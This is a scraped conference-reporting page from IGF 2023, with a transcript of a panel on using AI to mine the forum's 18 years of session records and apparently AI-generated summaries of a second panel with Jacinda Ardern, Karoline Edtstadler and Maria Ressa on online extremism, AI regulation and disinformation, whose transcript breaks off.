Furthermore, there is a strong emphasis on the importance of identifying and including underrepresented and marginalized groups in the IGF processes. The IGF Secretariat acknowledges the lack of participation from certain countries, disciplines, and target groups and is making efforts to map these missing entities and onboard them. This commitment underlines the IGF’s dedication to promoting inclusivity and reducing inequalities in the digital space.

Anja Gengo, an observer, is impressed by the examination of speech length and speed in the discussions. This analysis provides insights into communication dynamics and has the potential to improve the effectiveness of discussions during IGF events. Additionally, Gengo is excited about a mini competition, the outcome of which is eagerly anticipated.

Overall, the analysis of the IGF’s database and its efforts towards inclusion are deemed highly valuable for the IGF’s long-term utility. It not only enhances decision-making but also supports the IGF in effectively addressing the challenges and opportunities within the digital inclusion landscape.

Session transcript

Jovan Kurbalija:
Okay, I guess you can hear me now. Good, great to see you and you’re in unique position and it’s been on the perils of all who are going to miss this session, 5,000 people, because this is a special session. And this session is special because it speaks about something which is very concrete and also very powerful. It speaks about knowledge that has been developed over the last 18 plus years in the IGF community. Think just about all of the sessions discussion at this IGF, what was said, questions that were made, and what knowledge each of us gathered from it. Well I’m writing books and I have a few books and I here and there publish them and some people got interested in them, some not. And this is the way of preserving this knowledge. But generally speaking, this knowledge is not codified and made useful for our discussion, not only of us here. That’s important, but people outside IGF community who are impacted by what is discussed here or who may need to know more on the digitalization and issues. Now Diplo, together with Markus Kummer, who is today with us, who is, for those of you who are not aware, who is one of the real fathers of the Internet Governance Forum. There are so many fathers, you know, the successes have many fathers, but he created the first IGF and we started 2006 with the first reporting from IGF, a remote participation in the first reporting. Therefore we have now 18 years of the reporting from the IGF, which is very powerful knowledge base. Now from this IGF we are reporting as well. So you can get, for almost any session, you can get, including this session, you can get a few things. You can get a summary report written by experts, you can get a report written by AI, drafted by artificial intelligence, and you can have also daily IGF. You know how it is. First day you try to follow the sessions and you’re enthusiastic that you will grasp what’s going on. At least my experience after the first day I realized that it’s not impossible and you start navigating the lunch areas and the bar areas and connecting, which is great. I think this is a great purpose of IGF. But what we do every day, based on this reporting, we create IGF daily. There is just IGF daily from yesterday, which have a summary of discussions and top day picks. Therefore, with the help of AI system and our experts, we create a summary of what was discussed the previous day. Now we were very critical today because there are so many repetitions, you know. Technology will give opportunities but also make risks, but also some new insights and ideas. So there is that interplay between repeating, repeating, repeating, but also having some new insights. Now what you can also consult here and you can see on this website, I’m introducing this way functionally because this is the way that you understand what we are basically discussing when it comes to the AI. And here is, for example, I know one interesting session, I’m sorry, but I’ll find it here. It was climate, I think, one of the critical, probably I’ll miss, where you have the summary of the session and you have also indication of what was said and how the discussion space was framed. So you can have it and this is done by artificial intelligence. As we discussed, this session is also codified and translated by artificial intelligence and you can see the main points from discussion. You can see, for example, what was, let’s see, at least one session that I was in, which is bottom-up AI. You can see that there is a report from the session and there is a knowledge graph. How arguments which Sorina, who is here, and I made relate to each other around topics, around issues. Therefore you can finish this meeting as one big knowledge graph where you can see how discussion in this session relates to some other session. This is a huge, powerful knowledge database which is completely unused and it is a public good. It belongs to all of us. And this session aims to initiate this discussion together with our panelists, with Marcus and colleagues from IGF Secretariat and Anja and, of course, Sorina. And Marcus, when you started IGF, did you plan to make this big AI system or not? Just a few suggestions and a few reflections from your side and then we’ll move to Anja.

Markus Kummer:
Well, AI was not a hot issue then. There were other issues but let’s not forget, 20 years ago, the internet was not the same as it is now. I do remember when we celebrated the first billion internet users, first billion online, but I think it was 2005 or so. Now we have more, around six billion internet users, so just the sheer number, the sheer, is a huge difference. But 2005, we didn’t have video streaming, we didn’t have Skype, there was no Netflix, there was no YouTube. All these things have added and the apps didn’t exist, there are no smartphones, so it was a totally different environment. But what was already clear, the people, the internet users, cared very much about the internet and obviously access to the internet was still a number one priority but connectivity remains an important issue. I do remember when, I think it was 2008 or so, we started thinking about bringing more people online and, well, access was always a big issue but 2008, it was at the meeting in Hyderabad, somebody said, actually, the biggest challenge will be not the next billion people but the last billion people, to bring the last billion online because the next billions will come almost automatically, industry will do it and it has happened that way, indeed, we have now six billion people online but the last billion, that will be a challenge and obviously, it was also mentioned in today’s session on the way towards the GDC, there are digital issues but there are also analog issues and I think the languages remain an analog issue. To be really inclusive, I think the internet must become more multilingual. It’s obvious that the remaining people who are not online yet, they don’t come from the English-speaking world, they come from the countries with different languages and changes will happen. The more people that come online, they will come from different culture, bring different languages, different cultural values and that will also have an impact on the internet but back to your question, no, we didn’t think about AI, we didn’t also, we didn’t really know what to expect. We just realized there was a hunger for having these discussions and that manifested itself before, this is during the working group on internet governance when we held regular consultation, there was a clear appetite to have these discussions on issues surrounding the internet and also, then we had Tunis and the Tunis agenda remains very valid and there were those who thought internet governance was just about naming and addressing but the Tunis agenda clearly spells out internet governance is more than naming and addressing, more than the DNS and the allocation of internet protocol resources and it says the internet governance also is about issues relating to the use and abuse of the internet and that is a definition that is very broad indeed and that also obviously includes AI.

Jovan Kurbalija:
Marcus, one thing which you mentioned and I think is critical also for the future of AI is that there are so-called unintended consequences. You just start moving and you don’t know where we land and you end up with a great event and if you don’t mind, that could be a nice segue and what you mentioned, different cultural contexts, recently we did analysis of, for example, Ubuntu philosophy, African philosophy, which is not codified to the large extent but it should and can influence AI developments. I don’t know if you had something else to conclude and then we pass to Anya, Sorina and then to basicallyโ€ฆ

Markus Kummer:
Pass on, yes.

Jovan Kurbalija:
Good. Anya, you were in the Secretariat, you were sort of making sure that everything works and it’s great, great work behind the scenes, very often not noticeable but how do you see this knowledge dimension of this huge pool which we are trying at Diplo to activate somehow, how does it look from the perspective of the Secretariat?

Anja Gengo:
Thank you. Thank you very much, Jovan, and also to Sorina, thank you for organizing this session and continuously supporting the IGF. First of all, thank you for your kind words. I hope you’ll share Jovan’s words. I will not repeat again all this what I said. I hope you could hear me but if needed, I will. In any case, just a big thank you, of course, to the organizers and for the kind words. I hope that you shared the feedback as Jovan so far, that you’re enjoying the IGF and that the program-wise, technically-wise as well, fits your requirements to feel comfortable to navigate this very robust agenda. I fully agree with, of course, Marcus and Jovan both said, the IGF is just one big database of everything and everyone, to say it in a very blunt manner. If you look at the past 18 years of the IGF, and we internally, of course, have access to all its archives, then it’s a lot of terabytes of data of different kinds of reports, documents that have been produced so far, a lot of just records of participation of the world through the IGF and its multi-stakeholder model. For us, those are precious resources because they are very important indicators of the status quo, but they’re also excellent navigators of where we want to go in the future, given the fact that digital inclusion is at the core of the IGF. Numbers, for example, are important. If you look at the reports on statistics of the participation by country, by different profiles, then it gives you a very nice picture on who’s participating, but most importantly, who are we leaving behind, and where do we need to concentrate our, for example, capacity development efforts to ensure that everyone’s onboarded with us. All those analysis are done to a good extent by a very small team of the IGF Secretariat manually. It’s very good that we are now living in a phase of this rapid AI development, where the AI, at least certain segments of it, if maneuvered, if in good hands, can be a trusted tool to deal with this big database and to ensure that the data are processed in a quicker way and to give you accurate result that you want to achieve. So we certainly welcome the involvement of these systems, as long as they are trusted systems, in the IGF, as we are seeing it as a great help to improve the process, first of all, but especially to reach the inclusion level that we are aiming for years. And unfortunately, it’s still very challenging, regardless of the fact that, of course, we have a big portion of the world being unconnected. Good portion of the world is connected, and that meaningfully connected world is still not active participant in the IGF processes. So the Secretariat is aware of that. We work on that. We map basically through a multilayered dimension of the stakeholder community who is missing. So we’re looking at particularly certain countries that are missing, certain disciplines that are missing, target groups, for example. We’re looking who are the marginalized groups across communities. And you can imagine the complexity there. Not every country, every community shares the challenges, resources, capacity. So that’s the complexity, and a small team in Geneva of four or five persons working at the Secretariat certainly can’t manage that in a quick way. So we do welcome these types of support into the IGF system, and I think it would also make the participation of the just regular participants in the IGF’s intersessional work and the annual meeting much more quicker and more comfortable and meaningful for everyone.

Jovan Kurbalija:
Thank you, Anja. One point which came from your reflection is, if you count, I think counted something like 30 sessions discussing AI. And there is a hell of a lot of excitement. Everybody likes to become expert on AI. And what we are noticing, a high level of cliches. Whatever cliche is that AI is endangering humanity, will kill us all in a few years, to all the cliches. But what is one point is, and what always motivates us, at least as a Diplo, is that we have to walk to talk. Not only to talk about AI, but also to use AI as a practical tool. And it’s a bit, I expected a fuller room, but it seems people like magic, talk about magic of AI, but not necessarily to see how it works and how it operates. And what you’re doing in the Secretariat with very limited resources is you’re trying to walk the talk. And I think there is a need in the IG community more to walk the talk. To look under the bonnet and see what’s going on, what are neural networks, how TCPIP functions, how you do that. It will make much more serious discussion. Here is our next speaker, Serena, who is, as you know, a person who walks the talks on so many issues. And she’s probably a person who has the lowest tolerance for any sort of cliches. Sometimes, although I’m very careful about cliches, but sometimes I write something and Serena just call me from the other office, what do you mean? It’s another cliche. It’s a bit tolerant, a bit, you know, here and there I may use a cliche. Sorina, how we can walk the talk, what Anja started and…

Sorina Teleanu:
Well, maybe asking how do we avoid going too much into that. But beyond that, I don’t think there is a way to stop people using cliches at the IG or any other digital policy discussion. I have a challenge with the mics. Apologies. Technology is not helping us. I think the idea is to use technology for what it’s best at. Helping us, not replacing us. As Jovan was saying, there’s a lot of talk these days about how AI is going to destroy everything, take our jobs. Well, we’ve had a bit of fun over the past few days with our reporting. And I think I can say after two days that AI is not going to take my job anytime soon. But beyond that, look at the IGF. So we’re talking about how to make use of technology to show the wealth of knowledge that the IGF has acquired over the years. This is the 18th annual meeting. How many of you have read the… What’s the most recent annual report? Messages, let’s call it like that. How many of you have read IGF messages for the past, let’s say, three years?

Jovan Kurbalija:
But be frank.

Sorina Teleanu:
But be frank. Wow. We should give you an award or something. Excellent. And beyond those three years, have you read all IGF messages? Okay. Well done. The point is there’s so much produced every year. We have recordings from every single session. We have session reports. We have the messages. We have the annual report. We have policy network reports. We have best practice forum reports, outcome documents of the parliamentary track, youth dialogue reports. There’s so much happening, but we produce them every year, and then we kind of leave them there. Can we try to unpack a bit all this knowledge and see how the discussion on, for instance, digital divide evolved from 18 years ago when we started the IGF to now? How can we actually take advantage of everything that’s being discussed here at the IGF to move the debate forward instead of kind of repeating the same things all over again? And we think technology can help here, can give us like a starting point. Okay. I want to have another session. I’m speaking too fast. On the digital divide, this is what has been discussed about the digital divide at the IGF in the previous 18 years. Let’s see how we take this forward and stop saying the same things all over again. I’m trying to respond to Jovan’s question about how to avoid cliches. Maybe yes, we can use technology for that. Be a bit more innovative, be a bit more forward-looking into how we’re debating these things, starting from, yeah, looking at what has been said before and taking, again, taking it forward instead of repeating the same points. So our hope is that technology is going to help us a bit in that direction. And I think it’s also very timely in these current debates about, you know, digital cooperation forum possibly or not, and whether we need something new or not, again, showing the wealth of knowledge that the IGF has acquired over the years and how we can make most of it the most of it. Thank you.

Jovan Kurbalija:
Thank you. Thank you. Sorina, we are working on, with Sorina’s help, on the AI clichรฉ detector, which will immediately detect clichรฉs in any speeches, and sort of that would be interesting. We have to keep it a bit discreet because then people could be annoyed, oh, I’m telling clichรฉs, like myself, when Sorina detects clichรฉs in my writings, you feel like uneasy. We will conclude this intro with Wim. Wim, you have been involved with, let’s say, knowledge aspect of AI as expert consultants, participants in the MAG, putting different hats. And what’s your take on this huge knowledge base, which was described by all our discussant, and possibility of tapping it, need to tap it, how to do it?

Wim Degezelle:
Well, thank you. Just to clarify, well, I have been involved in a number of intersessional activities, and I think they go back on the initiative by Marcus, really to make a first step. An important step, I think, that was also from having discussions on topics at IGF, to having discussions that start in the months before IGF, and try to come up with already a tangible output, a tangible report. And I think that’s an important step already in the whole context, trying to codify and bring knowledge together. But now what we, and what my experience is, is we are now a step further, and the discussions are way more focused, but they’re still going on in different, I hesitate the word silos, that has a whole different bunch of meanings in the context of IGF. But just, we had, for example, this morning, a policy network on internet fragmentation. And one of the messages we say, it’s important that stakeholders work together and discuss this together, because there are different views. But at the same moment, I’m aware, and I looked at the agenda too, that there were 10 other workshops that are talking about the same topic. And in some workshops have been the days before, but they are actually saying exactly the same, but with different words. They come up with categories, they come up with this message from, we have to work together, we have to discuss together, but they just formulate it different. And it would be nice to combine these. And then coming back to the use of AI and use of technologies, if we, if I, or if we look at the schedule, it’s impossible to do that, even or even afterwards, or even making the links to last year. And I was just checking the tool that analyzed what I have been saying this morning. And I must say, I didn’t read the text, but the fact that this tool took from the five or 10 minutes that I was talking and divided that up into arguments, three or four different arguments, and automatically labels that from these or key topics. And then I see it also adds which SDGs could be linked or are linked to what I just have said. I think that’s already something wonderful. What I am, I think, missing or what would be great, but I think that was the graph you showed earlier, if this would also do the next step and then help with comparing and linking what is being said in other sessions, where you actually at the end of the week and say, well, we have had five sessions that maybe, I don’t know if the tool would be able to do that or if technology is to be, is able to bringing that fine tuning, but at least say they were talking about the same, go and check whether the new ones actually is just new ones or if they are talking about something different. So I think that there are huge opportunities there.

Jovan Kurbalija:
Thank you. Thank you, Wim. Well, as a matter of fact, it exists. We are fine tuning. As you said, this is approximation. And what is the beauty in this reporting system, which our colleagues may show again and what Wim was referring to, is that you’re always fine tuning with the experts. As Sorina said, sometimes we are underwhelmed with the quality. But when you correct, the AI system is learning how to do it in the next iteration. And as you can, what Wim was referring to is basically this type of, if you can just display quickly this, yes, this report from the session that you can use where you have main points from discussion done by experts and AI, provided by AI, by fine tune by experts. Then you have knowledge graph, which I said, where you have blue points are about topics and the white points are about speakers. And that’s probably the way if you put 10 sessions about fragmentation related issues, it can cross reference and say, hey, this was discussion in the session which Wim moderated and the next session that can help even visually. And then you have this, obviously, narrative report, which is what was also interesting. And I just invite you to look into this. At the bottom, you have for each session what was said, speed of speaking. We’ll have the fastest speaker at the IGF, which I’m getting since time is running out. A length of speech, we’ll have the shortest and longest speech at the IGF, speech time. And you have a report for per speaker. Therefore, you can see if what was said is basically useful, useful for discussion.

Wim Degezelle:
No. And what I referred to, if you click for more, it’s exactly the point I was making, that you have the different arguments split out and automatically linked to this topic. Well, and linked to topics. And I think that is a way you can compare with what is being said in other sessions.

Jovan Kurbalija:
Thank you. Well, I guess this is all from us, except if my fellow panelists do not want to say more. Anja, your body language?

Anja Gengo:
I am so impressed by this, looking into the speech length, speech speed and so on. And I’m very excited to see who wins this mini competition here. I don’t think you have me there, but I think I’ll be among the first five for sure. That’s speed, yes, the speed, but very interesting. And I think this is very useful for the IGF long term.

Jovan Kurbalija:
We may have even award for the fastest speaker at the IGF and slowest.

Markus Kummer:
If I may add a word, I mean, I did not talk about AI, but we were aware, of course, of the knowledge that was all. And we published it in book form the first years, you know, a summary of all that was said. But who reads a book and a summary? And here, this is an amazing tool. I do remember back in 2011, in the Nairobi IGF, I was on a panel, the main session, and Vint Cerf then said, pointed out that this immense data accumulated. And he said, there is a need for data mining. And now we are a little bit late, but this is precisely that. And it is very impressive indeed and a fantastic tool. Thanks.

Jovan Kurbalija:
I remember that session when the transcriber or automatic system was putting win surf instead of windsurf. And then we have to be careful because AI can misspell. But I can recall that point. Thank you. Any comments? I think the preferred point will be given to the person who read the last three reports. Good friend and colleague. And it’s so great to see you, a bit of a legendary member of the IGF community.

Audience:
Thank you, Jovan, and thank you for the wonderful panel. I would just like to commend the fact that the IGF became a knowledge base for us. Really, the beauty about it was because it was an independent platform that allows all stakeholders on equal footage to participate and contribute and talk about policy and also participate in capacity building and learning. The fact that it is a non-outcome event gave it more soft power to influence all Internet-related organizations, all stakeholders. We were disagreeing. We agreed. We reached a consensus and that consensus flew to other organizations. With time, it became a knowledge base. And I think it’s not only a knowledge base, it’s also a soft power or a soft force that influenced all related Internet governance organizations. And we’re blessed with resources from all over the world that we wouldn’t have the chance to know them if we didn’t participate in the IGF, like the wonderful panel that we see here from all over. So, these are all opportunities that have been given to us by the IGF, which someone at the time of those thought that it will not even continue to more than five years. And now we are 20 years and we’re looking for 20 years more, hopefully. So, hopefully. And actually, it became a model that has been copied into other dimensions. So, that was the beauty of the IGF. Another idea, since you talked about AI and clichรฉs, maybe you can use the narrative AI to see how the IGF has emerged and evolved over the 20 years and how it can move to the next 20 years.

Jovan Kurbalija:
Well, we won’t ask AI, we will ask you to write this article because you are the living legend of the AI and of the IGF. I think if I could buy it, it would be better. Okay, okay. Thank you. Well, those of you who are on ChargePT, you may ask ChargePT what it will, how ChargePT would answer El-Ghuzain’s questions on this issue. Well, if you don’t have any other comments, questions, it was also a short and sweet session. We didn’t take too much of your time. We heard many interesting ideas. We had heard from history, through Anja’s secretariat perspective, from Serena’s no-clichรฉ perspective, to Wim’s perspective of giving a concrete example of the reporting, as you said, giving a concrete example of the reporting as it is happening. And, well, that’s concluding a statement on the question of rich knowledge, not only codified in the sessions, but also in the way how IGF has been developing, performing, and developing some sort of tacit culture and understanding of thousands of people getting together and generating some new knowledge, new, sometimes, ethics, new respect, new understanding. And we shouldn’t forget it. We don’t live, unfortunately, in a society worldwide which cherishes respect and for different views. And the predominant view is that there are two views, my view and wrong view. And that’s how the world is, unfortunately, developing. But IGF has been fostering listening culture, engagement, respect for the others’ opinions. And I think, for me personally, it has been probably the first achievement, IGF. And we take this idea to use AI and human expertise, maybe to do another book on the AI and share with younger generations who should take it for the next 20 years. Thank you very much.

Anja Gengo

Speech speed

177 words per minute

Speech length

742 words

Speech time

251 secs

Audience

Speech speed

157 words per minute

Speech length

301 words

Speech time

115 secs

Jovan Kurbalija

Speech speed

156 words per minute

Speech length

2240 words

Speech time

861 secs

Markus Kummer

Speech speed

150 words per minute

Speech length

676 words

Speech time

270 secs

Sorina Teleanu

Speech speed

192 words per minute

Speech length

604 words

Speech time

189 secs

Wim Degezelle

Speech speed

169 words per minute

Speech length

612 words

Speech time

217 secs

Launch of Fellowship for Refugees on Border Surveillance | IGF 2023

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Audience

This comprehensive analysis covers a wide range of topics related to education, generative AI, risk management, information literacy, multi-stakeholder engagement, the actions of the European private sector in oppressive regimes, the impact of misinformation and disinformation, and the coexistence of privacy and safety in technology design.

One of the discussions revolves around educating people about generative AI and the need to mitigate its risks. The audience seeks advice on how to educate individuals about this technology, indicating recognition of its potential risks. However, the sentiment is neutral, suggesting a need for more information and guidance in this area.

Another argument highlights the importance of promoting critical thinking and curiosity among children in the face of the age of disinformation and rapid technological change. The supporting facts include a quote from Jacinda Ardern, who emphasises the shift from relying on facts obtained from traditional library resources to the current digital age with multifaceted sources. She urges individuals to seek knowledge about the process and origin of the information presented. This positive argument underscores the need to equip children with the necessary skills to navigate and critically evaluate information in the digital era.

The analysis also addresses the need for a multi-stakeholder approach to problem-solving and the challenges faced by civil society, particularly from the Global South, in effectively participating in solution-finding dialogues. These challenges include disparities in accessibility and effectiveness compared to governments and corporate organisations. This observation points towards the importance of inclusivity and equal representation in decision-making processes.

Another notable point relates to monitoring the actions of the European private sector, particularly within countries with oppressive regimes. The argument raises questions about how to effectively monitor the activities of companies operating in these contexts, such as China, Vietnam, and Myanmar. This highlights concerns about the impact of the private sector on human rights and the need for oversight and accountability.

The analysis also delves into the impact of misinformation and disinformation, noting that individuals who distrust institutions are more susceptible to these phenomena. This observation emphasises the importance of building trust in structures and institutions to combat the spread of false information.

Furthermore, the debate on designing technology that balances privacy and safety in the online world is also addressed. The argument suggests that current technology and design choices might limit the coexistence of privacy and safety, forcing the prioritisation of one over the other. This highlights the ongoing challenge of developing technology that can effectively address both concerns.

In conclusion, this analysis highlights the need to educate about generative AI, mitigate its risks, foster critical thinking and curiosity among children, ensure inclusivity in problem-solving dialogues, monitor the actions of the European private sector, build trust in institutions to combat misinformation, and address the challenge of designing technology that balances privacy and safety. These observations reflect the complexity and interdisciplinary nature of the issues discussed, as well as the importance of considering diverse perspectives to inform effective strategies and solutions.

Karoline Edtstadler

During the analysis, several key points were discussed regarding the views expressed by Karoline Edtstadler. Firstly, she emphasised the need for greater recognition and opportunities for ambitious women. Edtstadler observed that women who strive for success are often viewed negatively, being labelled as pushy or attempting to replace men. She believes that society should overcome this perception and provide more support and encouragement to women with ambitious goals.

Secondly, Edtstadler underscored the value of women’s unique perspectives in leadership roles. She argued that women’s ability to perceive life from their point of view โ€“ particularly as those capable of giving birth and responsible for nurturing and upbringing โ€“ makes them special. The shared yet different life experiences, such as motherhood, contribute to their valuable insights and decision-making capabilities.

In terms of AI regulation, the European Union’s efforts were commended. The EU is taking the lead in regulating AI and prioritising the classification of risks associated with AI applications. This focus on risk evaluation aims to strike a balance between promoting beneficial AI technologies and addressing potential societal impacts.

Austria was recognised for its proactive approach to digital market regulation. Even before the implementation of the EU’s Digital Services Act (DSA) and the Digital Markets Act (DMA), Austria had already established the Communications Platform Act, effective from 1st January 2021. Under this act, social media platforms are obliged to promptly address online hate speech. Austria’s early actions demonstrate the country’s commitment to creating legal frameworks concerning digital services.

Collaboration and multi-stakeholder involvement were identified as crucial factors in addressing the challenges posed by AI, digital markets, and misinformation. Edtstadler advocated for a concerted effort involving governments, parliamentarians, civil society, and tech enterprises. She emphasised the importance of collective efforts and shared understanding in tackling these complex issues.

The analysis also highlighted the importance of education and awareness in effectively handling the impacts of social media and new technologies like AI. This includes equipping the public with knowledge and skills to navigate technology, particularly among the elderly. Additionally, it was emphasised that regulations should strike a balance between ensuring safety and privacy while still fostering innovation.

Restoring trust in institutions, governments, and democracy was identified as a crucial objective. Given the rise of misinformation and disinformation during events like the Covid-19 pandemic, Europe aims to counter these challenges through robust regulations. By addressing the issue of misinformation, trust can be rebuilt among citizens.

It was also noted that technology, including AI, should not replace human decision-making, particularly in matters like judgment in law enforcement. While AI can offer efficiency in finding judgments and organising knowledge, drawing a clear line between human judgment and AI is important.

Handling the downsides of technology was deemed necessary to ensure its benefits for society. Technologies like AI can be used for good, such as performing precise surgeries and speeding up tasks in law firms. However, challenges and risks should be addressed to make technology beneficial for all.

The analysis further underlined the importance of a multi-faceted approach in decision-making processes. Edtstadler highlighted Austria’s implementation of the Sustainable Development Goals (SDGs), wherein civil society was invited to contribute and share their actions in dialogue forums. This multi-stakeholder approach promotes inclusivity and diversity of perspectives in decision-making.

In conclusion, the analysis emphasised the need for recognition and empowerment of ambitious women, effective regulation of AI and digital markets, collaboration among stakeholders, education and awareness, addressing challenges in democracy and technology, and restoring trust in institutions and governments. These key points and insights offer valuable perspectives for policymakers and individuals seeking to promote a fair and inclusive society in the face of technological advancements.

Jacinda Ardern

The Christchurch Call to Action is a global initiative aimed at tackling extremist content online. It was established in response to a terrorist attack in New Zealand that was live-streamed on Facebook. Supported by over 150 member organizations, including governments, civil societies, and tech platforms, the Call sets out objectives such as creating a crisis response model and better understanding the process of radicalization.

New Zealand Prime Minister Jacinda Ardern believes that it is crucial to understand the role of content curation in driving radicalization. She highlights the case of the terrorist involved in the Christchurch attack, who acknowledged being radicalized by YouTube. Ardern calls for an improved understanding of how curated content can influence behavior online.

Ardern advocates for a multi-stakeholder solution to address the presence of extremist content online. She emphasizes the need for collaboration between governments, civil society, and tech platforms, recognizing that it requires a collective effort to effectively eliminate such content. The Call focuses not only on existing forms of online terror tools but also aims to adapt to future forms used by extremists. It proposes measures such as implementing a strong crisis response model and working towards a deeper understanding of radicalization pathways.

Privacy-enhancing tools play a crucial role in preventing radicalization. These tools enable researchers to access necessary data to understand the pathways towards radicalization. By studying successful off-ramps, these tools can contribute to preventing further instances of online radicalization.

One of the challenges in understanding the role of algorithms in radicalization is the issue of privacy and intellectual property. It is difficult to obtain insight into how algorithms may drive certain behaviors due to privacy concerns and proprietary rights. Despite these challenges, gaining a deeper understanding of how algorithms contribute to radicalization is essential.

Artificial intelligence (AI) presents both opportunities and risks in addressing online extremism. AI can assist in areas where there have been previous struggles, such as content moderation on social media. However, caution exists among the public due to potential harm and risks associated with AI. Ardern argues that guardrails need to be established before AI can cause harm, and the development of these guardrails should involve multiple stakeholders, including companies, governments, and civil society.

The involvement of civil society is crucial in discussions around AI in law enforcement to protect privacy and human rights. Ardern believes that civil society, alongside the government, can act as a pressure point in addressing questions regarding privacy and human rights in the context of AI deployment.

Education plays a vital role in addressing online extremism. Teaching critical thinking skills to children is essential to equip them with the ability to think critically and evaluate information. Adapting to rapid technological changes is also necessary, as the accessibility of information has significantly evolved from previous generations, leading to challenges such as disinformation and the need for digital literacy.

The inclusion of civil society and continuous improvement are important aspects of addressing challenges. The creation of a network that includes civil society may face practical obstacles, but ongoing efforts are being made to involve civil society in initiatives such as the Christchurch Call. Ardern acknowledges that learning and improvement are continuous processes, emphasizing the importance of making engagement meaningful and easy.

Overcoming the debate around privacy and safety on social media is a critical step in addressing extremist content online. Efforts to access previously private information through tools created by the Christchurch Call Initiative are underway, allowing researchers to study this information in real-time. The findings of the research will inform further action, involving social media companies in addressing the identified issues.

Disinformation is a significant challenge, and Ardern highlights factors that make individuals susceptible to it, such as distrust in institutions, disenfranchisement, lower socioeconomic status, and lesser education. Preventing individuals from falling for false information is crucial, and rebuilding trust in institutions is necessary to address the impact of disinformation.

Supporting regulators focusing on technological developments is crucial in managing the challenges presented by technological advancements. Ardern acknowledges the poly-crisis resulting from these developments and emphasizes the need to support regulatory efforts.

Ardern expresses optimism in the ability of humans to adapt and design solutions for crises. She has witnessed humans successfully designing solutions and rapidly adapting to protect humanity, giving hope for addressing the challenges posed by technological developments.

Information integrity issues, such as the lack of a shared reality around climate change, impact serious problems. Ardern emphasizes the need to address these issues to effectively tackle challenges like climate change.

In conclusion, the detailed analysis highlights the importance of the Christchurch Call to Action in addressing extremist content online. The Call emphasizes the need for a multi-stakeholder approach involving governments, civil society, and tech platforms. Privacy-enhancing tools and understanding the role of algorithms are crucial in preventing radicalization. Guardrails need to be established for AI before it can cause harm, with civil society involvement to protect privacy and human rights. Education plays a vital role in teaching critical thinking skills and adapting to technological changes. The involvement of civil society, continuous improvement, and overcoming the debate around privacy and safety on social media are essential steps in addressing extremist content. The management of disinformation, support for regulators, and human adaptability in designing solutions for crises are also key considerations.

Maria Ressa

The analysis of the given information reveals several important points made by the speakers. Firstly, it highlights the significant online harassment faced by women journalists, which hampers their ability to participate in public discourse. It is reported that women journalists covering misogynistic leaders often face considerable online harassment and are frequently told to ‘buckle up’ by their editors. This indicates a systemic problem that needs to be addressed.

The role of technology in facilitating hate speech and the dissemination of harmful content is also underscored. The Christchurch terrorist attack, for instance, was live-streamed, demonstrating the misuse of technology for spreading violent and harmful content. This highlights the need to address the role of technology in inciting hate and enabling the circulation of such harmful material.

Efforts to address these challenges require more than just asking news organisations to remove harmful content. The analysis suggests that a multi-stakeholder effort is necessary. Following the Christchurch attack, Jacinda Ardern led a successful multi-stakeholder initiative known as the Christchurch Initiative, which aimed to eliminate extremist content online. This approach emphasises the need for collaboration and coordination among various stakeholders to effectively combat online attacks and extremist content.

The analysis also highlights the importance of strong government action in addressing this issue. The New Zealand government, for instance, took robust measures to eliminate the influence of the Christchurch attacker by removing his name and the footage of the attack from the media. However, it is crucial that government action remains inclusive and does not suppress free speech.

Furthermore, the analysis points out that valuable lessons can be learned from the Christchurch approach in combating radicalisation. The approach was developed in response to a horrific domestic terror attack that was live-streamed on Facebook. It aims to understand how people become radicalised, with a focus on the role of curated content and algorithmic outcomes online.

The impact of social media behaviour modification systems and the current focus on content moderation is a source of concern. Data from the Philippines has been analysed, indicating that lies spread faster on social media than factual information. The analysis argues that current solutions, which mainly focus on content moderation, are not effective in addressing the problem. Instead, a shift towards addressing structural issues, such as platform design, is recommended.

Furthermore, the potential harms of generative AI should be prevented rather than merely reacted to. Concerns over the impact of generative AI are mentioned, and the need for proactive measures to address the harm caused by AI is emphasised.

Civil society collaboration and the corruption of the information ecosystem are seen as crucial problems. The analysis suggests that civil society needs to come together more to address these challenges effectively.

The weaknesses of institutions in the global south, as well as countries experiencing regression of democracy, contribute to the challenges. Authoritarian leaders are leveraging technology to retain and gain more power, which further exacerbates the issue.

Interestingly, the analysis highlights that even intelligent individuals can fall victim to misinformation and behaviour modification in information warfare or operations. This emphasises the need for education and awareness to combat these challenges effectively.

The integration of privacy and trust into tech design is seen as possible; however, it often lacks regulation and pressure from civil society.

Lastly, the analysis suggests that we are in a pivotal moment for internet governance. Maria Ressa, one of the speakers, expresses a more pessimistic viewpoint on the situation, while others remain optimistic. The importance of effective internet governance is underscored, as it directly impacts various areas, including peace, justice, and strong institutions.

In conclusion, the analysis highlights the challenges faced by women journalists in public discourse, the negative impact of technology in facilitating hate speech and harmful content, the need for multi-stakeholder approaches, the importance of strong government action, and the lessons from the Christchurch approach. It also emphasises the concerns regarding social media behaviour modification systems and the current focus on content moderation. Structural issues in platform design, prevention of harm from generative AI, civil society collaboration, corruption of the information ecosystem, weaknesses of institutions, susceptibility to misinformation, and the incorporation of privacy and trust into tech design are other noteworthy points raised. Overall, the analysis underscores the significance of effective internet governance in addressing these complex issues.

Session transcript

Karoline Edtstadler:
It’s really a big honor for me to sit on the same panel, even if you’re not here, Jacinda, with you. You are really also a role model for women, and it’s a pleasure that I have the impression I’m getting also a role model by hearing what you said about me. So I would say you can break it down with a joke, which is of course only a joke, but this goes the following. The last 2,000 years, the world has been ruled by men. The next 2,000 years, the world will be ruled by women. It can only get better. But this is not the end of the story, because we are living in a very diverse world. We are living in a challenging world, and I think we need both, the approach of women and of men. But the difference is, and Jacinda already mentioned, being ambitious is something very important, that we women are judged and seen in a different way. If you are ambitious as a woman, you’re the pushy one. You’re the one you want to get the position of a man, and so on and so forth. And I think what we as a society have to learn is that we need both ways of seeing the world. And we women can make a difference, because we are giving birth. We are mothers. We are really perceiving the life. And I think this is also why we are different than men. And that’s good. There’s nothing bad in it. And especially in times like that, you mentioned a few of the crises we are still going through. It’s very important to have both ways of seeing the world, both assessments of female and male. And one last thing, I think women are still not that good than men in making better networks, in holding together, in encouraging ourselves. And that’s why I founded a conference last year in August in Salzburg, which is called The Next Generation is Female. And it’s not about things against men. It’s with the support of strong men. And it’s really for female leaders in Europe to get together, to network, to exchange their selves, and to have personal chains also and encourage ourselves, because it’s not easy and we will go into details also regarding hatred in the internet and being judged as a woman.

Maria Ressa:
